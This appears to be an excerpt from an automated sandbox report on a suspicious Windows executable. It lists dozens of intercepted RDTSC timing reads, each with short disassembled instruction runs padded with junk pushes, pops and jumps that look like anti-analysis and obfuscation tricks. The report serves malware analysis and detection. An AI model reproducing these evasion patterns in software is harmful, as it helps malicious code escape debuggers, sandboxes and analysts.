                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A285 second address: D0A28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A6AA second address: D0A6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F1770F37A01h 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F1770F379F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A6CA second address: D0A6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A9C7 second address: D0A9D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A9D2 second address: D0A9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D8F0 second address: D0D8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D9FE second address: D0DA0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F1770B77E96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DA0C second address: D0DA10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DAC8 second address: D0DAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1770B77EA5h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DAEC second address: D0DB16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jo 00007F1770F379F6h 0x00000010 pop edi 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jbe 00007F1770F379F6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DB16 second address: D0DB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DBB0 second address: D0DBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F1770F37A04h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f add dword ptr [ebp+122D27A0h], esi 0x00000015 jmp 00007F1770F37A07h 0x0000001a push 2C54A386h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DBF5 second address: D0DBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DBF9 second address: D0DBFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DBFD second address: D0DC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F1770B77E98h 0x0000000c popad 0x0000000d xor dword ptr [esp], 2C54A306h 0x00000014 mov dword ptr [ebp+122D1CE2h], eax 0x0000001a push 00000003h 0x0000001c add ecx, dword ptr [ebp+122D29C2h] 0x00000022 push 00000000h 0x00000024 je 00007F1770B77E9Ch 0x0000002a mov edi, dword ptr [ebp+122D1951h] 0x00000030 push 00000003h 0x00000032 mov edi, dword ptr [ebp+122D2B3Ah] 0x00000038 call 00007F1770B77E99h 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F1770B77EA9h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DC5B second address: D0DC71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770F37A02h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DC71 second address: D0DC97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a jmp 00007F1770B77EA1h 0x0000000f pop esi 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF773F second address: CF7745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7745 second address: CF774F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF774F second address: CF7767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F1770F379F6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7767 second address: CF776B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF776B second address: CF7784 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1770F379F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1770F379FCh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CA87 second address: D2CA8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CA8B second address: D2CA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jl 00007F1770F37A0Eh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CC03 second address: D2CC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D11B second address: D2D11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D11F second address: D2D12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F1770B77E96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D275 second address: D2D296 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1770F379FBh 0x0000000d jmp 00007F1770F379FEh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D296 second address: D2D29C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D29C second address: D2D2AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1770F379FBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D2AC second address: D2D2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D3F9 second address: D2D3FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D3FF second address: D2D403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D403 second address: D2D407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D54A second address: D2D54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D7FA second address: D2D83C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A04h 0x00000007 jnc 00007F1770F379F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1770F37A09h 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F1770F379F6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D83C second address: D2D840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D840 second address: D2D84C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D84C second address: D2D859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jne 00007F1770B77E96h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF15F second address: CEF165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF165 second address: CEF16B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D9AA second address: D2D9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770F37A06h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E118 second address: D2E11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E11C second address: D2E120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E120 second address: D2E136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1770B77EA0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E3C9 second address: D2E3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F1770F379F6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E3D5 second address: D2E3E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E6B4 second address: D2E6BE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1770F379F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32726 second address: D32743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32743 second address: D32749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFE68 second address: CFFE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770B77EA3h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F1770B77E96h 0x00000012 jns 00007F1770B77E96h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFE37C second address: CFE3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F1770F37A00h 0x0000000b jmp 00007F1770F37A02h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0346A second address: D0347E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a jc 00007F1770B77EA6h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A6DA second address: D3A6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1770F379F6h 0x0000000a popad 0x0000000b jmp 00007F1770F379FBh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A6F0 second address: D3A70D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770B77EA7h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A9F0 second address: D3A9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A9F4 second address: D3AA0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AA0C second address: D3AA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AA15 second address: D3AA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007F1770B77E98h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jc 00007F1770B77E96h 0x00000017 jmp 00007F1770B77E9Bh 0x0000001c pop edi 0x0000001d jmp 00007F1770B77EA8h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3ABB3 second address: D3ABDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770F379FAh 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e jmp 00007F1770F37A00h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AEF3 second address: D3AF07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AF07 second address: D3AF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AF0D second address: D3AF19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1770B77E96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B028 second address: D3B03E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F379FAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F1770F379F6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B03E second address: D3B074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA2h 0x00000007 jbe 00007F1770B77E96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jo 00007F1770B77EB5h 0x00000017 jmp 00007F1770B77E9Dh 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B1C4 second address: D3B1CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C249 second address: D3C277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F1770B77EA3h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jne 00007F1770B77E9Ch 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C3E7 second address: D3C3ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C3ED second address: D3C3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C5EC second address: D3C5F6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1770F379F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C6B2 second address: D3C6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C87A second address: D3C880 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D4BD second address: D3D4C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D4C2 second address: D3D4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D51E second address: D3D535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F1770B77E96h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D535 second address: D3D593 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F1770F379F8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D299Ah] 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f jmp 00007F1770F37A03h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D593 second address: D3D597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40C0B second address: D40C12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D416D3 second address: D416D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49886 second address: D4989C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4989C second address: D498A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F1770B77E96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D498A7 second address: D49917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F1770F379F8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D23CAh], eax 0x0000002a push 00000000h 0x0000002c jnl 00007F1770F379F9h 0x00000032 pushad 0x00000033 mov ecx, dword ptr [ebp+122D2B4Ah] 0x00000039 mov dword ptr [ebp+12475D71h], edi 0x0000003f popad 0x00000040 push 00000000h 0x00000042 jmp 00007F1770F379FCh 0x00000047 xchg eax, esi 0x00000048 jng 00007F1770F379FEh 0x0000004e push eax 0x0000004f jnp 00007F1770F379F6h 0x00000055 pop eax 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49917 second address: D4991B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4991B second address: D49925 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1770F379F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A907 second address: D4A94F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+124770BAh] 0x00000010 mov ebx, dword ptr [ebp+122D2AF6h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a mov edi, ebx 0x0000001c xchg eax, esi 0x0000001d je 00007F1770B77EA4h 0x00000023 push eax 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F1770B77EA3h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44936 second address: D4493C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E8F9 second address: D4E8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E8FD second address: D4E901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49A59 second address: D49A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E901 second address: D4E959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 sub bx, 869Ah 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F1770F379F8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D1EF4h], eax 0x00000031 jmp 00007F1770F37A07h 0x00000036 xchg eax, esi 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a jng 00007F1770F379F6h 0x00000040 rdtsc
